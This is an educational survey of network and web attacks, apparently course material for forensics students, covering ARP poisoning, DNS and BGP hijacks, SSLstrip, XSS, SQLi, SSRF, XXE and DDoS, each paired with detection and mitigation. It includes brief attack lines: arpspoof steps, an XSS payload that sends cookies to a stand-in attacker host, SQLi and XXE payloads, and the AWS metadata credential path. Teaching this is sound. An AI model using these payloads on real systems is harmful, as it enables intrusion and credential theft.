Network Attacks: Sniffing, ARP Poisoning, MITM, DDoS, XSS and SQLi

Packet sniffing is the foundation under most other network attacks. A sniffer reads frames off the medium and feeds them to a dissector. On a wired switched network the sniffer's reach is limited to its own port, broadcast traffic, and whatever a managed switch's SPAN or RSPAN session is configured to mirror. On a Wi-Fi network in monitor mode a sniffer reads every frame on the chosen channel within radio range, encrypted or not.

The standard tool stack is small. Wireshark is the desktop dissector, with dissectors for over 3000 protocols and a TLS keylog import facility for decrypting captures when SSLKEYLOGFILE was set. tcpdump is the BSD-licensed command-line capture tool, the workhorse on Linux servers. tshark is Wireshark's command-line sibling, used for scripted capture and BPF filtering. Ettercap is the active-MITM workhorse with built-in ARP poisoning, DNS spoofing, and SSLstrip plug-ins. Bettercap is the modern Go-based replacement for Ettercap, scripted in Caplets. Cain & Abel was the historical Windows toolkit, now retired but still cited in older reference materials. Aircrack-ng is the Wi-Fi capture and crack suite.

Passive sniffing leaves no observable trace on the wire. The sniffer's network card is in promiscuous mode (wired) or monitor mode (Wi-Fi), it does not transmit, and the only way to catch a passive sniffer is physical inspection or, on some old systems, a latency-based test that exploits ARP and ICMP response times when the kernel is busy with extra frames. Active sniffing transmits forged frames to coax traffic into reaching the sniffer's port: ARP poisoning is the canonical example, but port stealing (the attacker keeps re-claiming a switch port for its own MAC) and STP root-bridge attacks (the attacker advertises itself as root and reshapes the spanning tree) also count.

Spoofing describes attacks in which the adversary forges a source identifier. Each layer of the stack has a corresponding spoofing technique.

IP spoofing is the original attack, made famous in 1995 when Kevin Mitnick used it to impersonate a trusted host against Tsutomu Shimomura. The mitigation is BCP38 (RFC 2827), source-address filtering at the network ingress: a provider drops outbound packets whose source IP does not belong to the customer's allocated prefix. Indian Tier-1 ISPs largely implement BCP38 on their downstream peering, which is why IP-spoofed reflection attacks at scale are mostly sourced from misconfigured providers abroad.

MAC spoofing is a one-line command (ip link set dev eth0 address aa:bb:cc:dd:ee:ff on Linux, macchanger, or Wi-Fi privacy MAC randomisation on every modern phone). It defeats simple MAC filtering on home routers and is routine for any attacker on a captive portal or hotel Wi-Fi.

ARP spoofing is the LAN-scoped attack covered in detail in the next section. DNS spoofing is covered in section 4. Email spoofing is what every romance scam and CEO fraud is built on: forging the From header to look like a trusted sender. SPF (Sender Policy Framework, RFC 7208) lists which IPs are authorised to send for a domain. DKIM (DomainKeys Identified Mail, RFC 6376) cryptographically signs the message. DMARC (RFC 7489) tells receivers what to do when SPF or DKIM fails. A receiving mail server that enforces strict DMARC on gov.in mail rejects most spoofing attempts at the perimeter.

ARP, the Address Resolution Protocol (RFC 826), maps a Layer 3 IPv4 address to a Layer 2 MAC on the local segment. A host that wants to talk to 192.168.1.1 broadcasts an ARP request who has 192.168.1.1, tell 192.168.1.50; the router replies with its MAC; the requester caches the binding. ARP has no authentication. Any host on the segment can send an unsolicited (gratuitous) ARP reply claiming to own any IP, and most operating systems happily update their caches.

ARP poisoning exploits that. The attacker sends two streams of gratuitous ARP replies on the LAN: one to the gateway claiming victim_IP is at attacker_MAC, and one to the victim claiming gateway_IP is at attacker_MAC. After both caches update, every packet between the victim and the gateway transits the attacker, who forwards the traffic onward to maintain the illusion of normal connectivity and reads or modifies it in flight.

1. Reconnaissance
   Attacker enumerates the LAN with arp-scan or a Bettercap probe to find the gateway and the target. Takes seconds on a /24.
2. Forge ARP replies
   Run `arpspoof -i wlan0 -t 192.168.1.50 192.168.1.1` (target victim, telling them attacker is the gateway) and the reverse.
3. Enable forwarding
   `sysctl -w net.ipv4.ip_forward=1` on the attacker so packets continue to the real gateway, hiding the attack from the user.
4. Capture or modify
   Pipe through Wireshark for read-only capture, or through Bettercap modules (`http.proxy`, `https.proxy`, `dns.spoof`) for active modification.
5. Restore
   Send corrective ARP replies on exit to re-bind real MACs to real IPs, leaving the LAN as found (rarely done by attackers in the wild).

The standard ARP poisoning tools are arpspoof (part of the dsniff suite), Ettercap (with the arp plug-in), Bettercap (arp.spoof module), and historically Cain & Abel on Windows. Detection runs at two levels. arpwatch (LBNL, Unix) logs new MAC-IP bindings on the local segment and emails alerts when a binding changes; sudden alerts during business hours are a high-signal ARP spoofing indicator. ArpON is a Linux kernel-level defender that statically pins gateway bindings. X-ARP is a Windows-side equivalent. Enterprise switches implement Dynamic ARP Inspection (DAI) on Cisco gear, which validates ARP replies against a DHCP snooping binding table and drops mismatches at the switchport.

The scope is the broadcast domain only. ARP poisoning works within a single VLAN; it does not cross a router. An attacker on a corporate guest VLAN cannot poison ARP for hosts on the production VLAN. The forensic detection in a capture is the appearance of duplicate IP claims with different MACs in close succession, plus a sudden re-route of the victim's traffic through an unexpected MAC. The same MITM position can be obtained from a rogue access point on Wi-Fi, covered in the wireless attack topic.

DNS spoofing has three operational forms. Local LAN DNS spoofing uses ARP poisoning to put the attacker on the path, then rewrites DNS responses in flight (Bettercap's dns.spoof module is a one-liner). Cache poisoning targets a recursive resolver: the attacker races the legitimate authoritative reply by guessing the resolver's source port and the 16-bit transaction ID and injecting a malicious reply first. Dan Kaminsky's 2008 work showed that the resolver could be tricked into accepting glue records for an entire zone in seconds when source-port randomisation was missing, and forced every major DNS implementation to deploy source-port randomisation within weeks. DNSSEC (RFC 4033 onward) signs DNS records with public-key cryptography; a validating resolver rejects unsigned or invalidly signed replies. DoH (DNS over HTTPS, RFC 8484) and DoT (DNS over TLS, RFC 7858) encrypt the query channel to the resolver, defeating local LAN DNS spoofing but not cache poisoning.

Routing table poisoning at the BGP layer changes the path that traffic takes between autonomous systems. Two cases shape the textbook:

• YouTube vs Pakistan, February 2008: Pakistan Telecom (AS 17557) announced a more specific BGP prefix for YouTube's IP range to blackhole the service domestically, but the announcement leaked to its upstream (PCCW, AS 3491) and propagated globally, taking YouTube offline for about 2 hours.
• Amazon Route 53 hijack, April 2018: an attacker hijacked the BGP prefix for Route 53's authoritative DNS, redirected MyEtherWallet queries to a server they controlled, and stole around 152,000 USD of Ether before the route was withdrawn.

RPKI (Resource Public Key Infrastructure, RFC 6480) signs BGP route origin claims and lets validating routers reject unsigned or invalid announcements. Indian carriers Tata Communications and Reliance Jio publish ROAs (Route Origin Authorizations) on most of their prefixes as of 2025.

SSLstrip (Moxie Marlinspike, 2009) is the canonical HTTPS downgrade attack. The attacker, already in a MITM position, intercepts the user's first plain HTTP request to a site, fetches the real HTTPS page on the user's behalf, rewrites every https:// link in the returned HTML to http://, and serves the modified plaintext page to the victim. The user's address bar shows http:// rather than the padlock, but most users miss it. Mitigations are HSTS (HTTP Strict Transport Security, RFC 6797), where the server tells the browser to refuse plain-HTTP connections for a set time; HSTS preload lists, where popular domains are baked into every browser shipping; and HTTPS-only mode, on by default in Firefox and Edge as of 2024. The downgrade dance, broader than SSLstrip, includes TLS version downgrade attacks like POODLE (CVE-2014-3566) and Logjam (CVE-2015-4000) that exploited acceptance of older TLS versions or weak Diffie-Hellman groups.

Web jacking combines DNS spoofing with phishing: the attacker either poisons a resolver or compromises a registrar account to repoint a domain to their own server, then serves a clone of the original site. The 2010 Baidu hijack via the Iranian Cyber Army is the canonical example; the 2018 MyEtherWallet incident above is the BGP variant.

A large proportion of casework against Indian e-commerce, fintech, and government portals involves the web application layer. The current OWASP Top 10 (2021 edition, the active list while OWASP prepares the 2025 refresh) ranks ten risk categories. Each maps to one or more attack technique families.

Cross-Site Scripting (XSS) is OWASP A03 Injection's web sibling. Three sub-types:

• Reflected XSS: the payload arrives in a request parameter and is echoed back into the response without escaping. Example: https://example.in/search?q=<script>fetch('//attacker/'+document.cookie)</script>. Single-victim, link-driven.
• Stored (persistent) XSS: the payload is saved server-side (a comment, a profile bio) and served to every visitor. Higher impact; one injection point hits all readers.
• DOM-based XSS: the payload never reaches the server. Client-side JavaScript reads document.location or window.name and writes it into the DOM without sanitisation. Indistinguishable from reflected XSS in the network capture; only static or dynamic analysis of the JS reveals the sink.

Mitigation is output encoding by context (HTML body, attribute, JS string, URL, CSS each need different escaping), input validation (allow-list per field), and a Content-Security-Policy header that whitelists the sources of executable script. CSP does not replace sanitisation but limits the impact when sanitisation fails.

SQL Injection (SQLi) breaks out of the SQL string context and lets the attacker run arbitrary database queries. Three styles by exfiltration channel:

• Union-based: ' UNION SELECT username, password FROM users -- appended to a numeric ID parameter, where the response renders the union row. Fast.
• Boolean blind: the response differs visibly when the injected condition is true vs false; the attacker bit-bashes data one boolean at a time. ' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE id=1)='a' -- .
• Time-based blind: the condition triggers a deliberate delay (IF(condition, SLEEP(5), 0)); the attacker reads the answer from the response time. Slow but works when no other channel is visible.

sqlmap is the standard automated exploitation tool, supporting all three styles and dozens of database fingerprints. The mitigation is parameterised queries (prepared statements with bound parameters), which separate the SQL template from the user-supplied values so that no input can break out of the string context. ORM frameworks like Django ORM, SQLAlchemy and Hibernate parameterise by default; raw psycopg2.execute("SELECT ... WHERE id=" + user_input) does not.

CSRF (Cross-Site Request Forgery) makes a logged-in user's browser submit an authenticated request to a target site without their knowledge. The attacker hosts a hidden form on attacker.com that POSTs to bank.in/transfer; the victim's browser sends the bank session cookie automatically. Mitigations are anti-CSRF tokens (a random per-session value the server embeds in forms and validates on submit) and SameSite cookies (Lax or Strict, which restrict cookie sending on cross-origin POSTs). Modern browsers default to SameSite=Lax for cookies that don't set the attribute, which has killed most casual CSRF in the wild.

SSRF (Server-Side Request Forgery) makes the server fetch a URL the attacker chooses. The textbook target is the AWS Instance Metadata Service at 169.254.169.254/latest/meta-data/iam/security-credentials/, which returns temporary IAM credentials. The 2019 Capital One breach was an SSRF hit on AWS metadata that exfiltrated credentials and then 100 million customer records. AWS IMDSv2 requires a session-token PUT first, blocking the trivial SSRF path; IMDSv1 is still enabled by default on older AMIs and is widely exploitable.

XXE (XML External Entity) abuses XML parsers that resolve external entities. An XML document with <!ENTITY xxe SYSTEM "file:///etc/passwd"> and a reference &xxe; reads the server's password file when parsed by a vulnerable processor. The mitigation is disabling external entity resolution; modern libxml2, .NET's XmlReader and Java's SAXParser ship with it off by default since 2014-2015.

Denial-of-service attacks are classified by the resource they exhaust.

Volumetric attacks saturate the target's upstream bandwidth. The attack volume is measured in bps (sometimes pps for packet rate). UDP flood, ICMP flood and amplified reflection attacks fall here. Reflection/amplification is the high-leverage technique: the attacker sends a small spoofed-source query to a misconfigured service (DNS open resolver, NTP monlist, memcached UDP, SSDP) and the service sends a much larger reply to the spoofed victim. The amplification factor is the ratio of reply to query: DNS ANY queries amplify roughly 28x to 54x; NTP monlist amplifies 500x to 580x; memcached amplifies up to 51,000x and was responsible for the 1.35 Tbps GitHub attack in February 2018 and the 1.7 Tbps NetScout attack in March 2018.

Protocol attacks exhaust state on stateful boxes (load balancers, firewalls, application servers). SYN flood sends TCP SYNs without completing the handshake; the target holds half-open connection state until the SYN backlog fills. Mitigation: SYN cookies (Linux tcp_syncookies), which encode the connection state in the SYN-ACK sequence number so no backlog is needed. Fragmentation attacks send overlapping or oversized IP fragments that confuse reassembly (Teardrop, Ping of Death; mostly dead since the 2000s but resurface on poorly maintained embedded stacks).

Application-layer attacks exhaust application resources at low bandwidth. Slowloris opens many HTTP connections and sends partial headers, never finishing the request; a single laptop on a 10 Mbps link can take down an unhardened Apache server. HTTP GET flood uses real-looking GET requests to fetch expensive resources (search pages, dynamic reports); a botnet of compromised home routers serves the requests, and the target cannot distinguish them from legitimate users without rate limiting or behavioural fingerprinting.

The botnet of record is Mirai (Anna-Senpai source code release, September 2016), which compromised IoT devices (DVRs, IP cameras, home routers with default Telnet credentials) and produced the September 2016 attacks against Krebs on Security (around 620 Gbps), OVH (around 1 Tbps), and the October 2016 Dyn attack (1.2 Tbps) that took Twitter, Reddit, GitHub and Spotify offline for hours.

DDoS mitigation runs at three layers. Edge scrubbing (Cloudflare, Akamai, Imperva, AWS Shield Advanced) absorbs the attack on a globally distributed network and forwards clean traffic to the origin. ISP null-routing (BGP flowspec or RTBH, Remote Triggered Black Hole) drops traffic to the attacked IP at the carrier edge, which keeps the rest of the network up at the cost of the attacked service. Application-layer rate limiting (NGINX limit_req, Cloudflare rules, application WAF) caps request rates per IP, per session token or per behavioural fingerprint.

Technical attacks ride on top of human ones. Phishing at network scale comes in several shapes. Spear phishing targets a named individual using their context (their boss's writing style, their HR portal's branding). Whaling targets executives. Smishing is phishing over SMS, and on Indian carriers it remains the dominant vector for OTP harvesting and UPI fraud routed through the I4C 1930 helpline. Phishing kit hosting is the network-layer artefact: a kit deployed on a compromised hosting account at a small Indian provider, fronted by a freshly registered look-alike domain on .in or .co.in. The kit collects credentials and POSTs them to a Telegram bot for live operator follow-up. CERT-In's quarterly Phishing Activity Trends advisories list the most-impersonated brands; in 2024-2025 those were SBI, HDFC Bank, Axis Bank, India Post, IRCTC and the Income Tax e-filing portal.

Social engineering without phishing covers pretexting (the attacker calls posing as a vendor or auditor with a story that justifies an information request), baiting (the attacker leaves a USB stick labelled "Payroll 2026" in a parking lot), tailgating (physically following an employee through a secure door), and quid pro quo (the attacker offers help in exchange for a credential). Indian call-centre cybercrime rings, especially the Jamtara cluster operating across Jharkhand and West Bengal, run pretexting and quid pro quo at industrial scale; NCRB's Crime in India annual report consistently ranks Jharkhand among the highest per-capita cyber-fraud districts.

Zero-day exploits are bugs unknown to the vendor, sold or used before a patch exists. Bug bounty platforms (HackerOne, Bugcrowd, YesWeHack, India's own NCIIPC Responsible Vulnerability Disclosure Programme) pay researchers for coordinated disclosure. CVE assignment is the MITRE-coordinated identifier; NVD at NIST publishes the CVSS scores. CISA KEV (Known Exploited Vulnerabilities) is the catalogue of CVEs proven to be actively exploited; as of May 2026 it lists over 1100 entries. The Indian equivalent advisory channel is CERT-In's vulnerability notes (CIVN series). Examples of high-impact recent CVEs: CVE-2021-44228 (Log4Shell, JNDI lookup in Log4j), CVE-2022-0847 (Dirty Pipe, Linux kernel pipe write), CVE-2024-3094 (XZ Utils backdoor in liblzma).

Rogue access points are MITM machinery at the wireless edge; the evil twin is a rogue AP that copies the SSID of a legitimate one to harvest clients, and captive portal abuse serves a fake login portal to harvest credentials. Fuller coverage lives in wireless network attacks across WEP, WPA, WPA2, WPA3 and rogue AP.

Insider threats account for a steady fraction of incidents that CERT-In handles. The Ponemon/DTEX 2023 Cost of Insider Risks Global Report puts the average total annual cost per organization at 16.2 million USD (up from 15.4 million USD in 2022); the 2024 edition raised that figure to approximately 17.4 million USD; Verizon's 2024 DBIR pegs internal actors at 35% of all breaches. Detection runs on UEBA (User and Entity Behaviour Analytics) inside a SIEM, plus DLP at the egress. The trigger for SFSL involvement is usually a HR-side complaint that leads to a workstation imaging order under the workflow described in the malware forensics topic.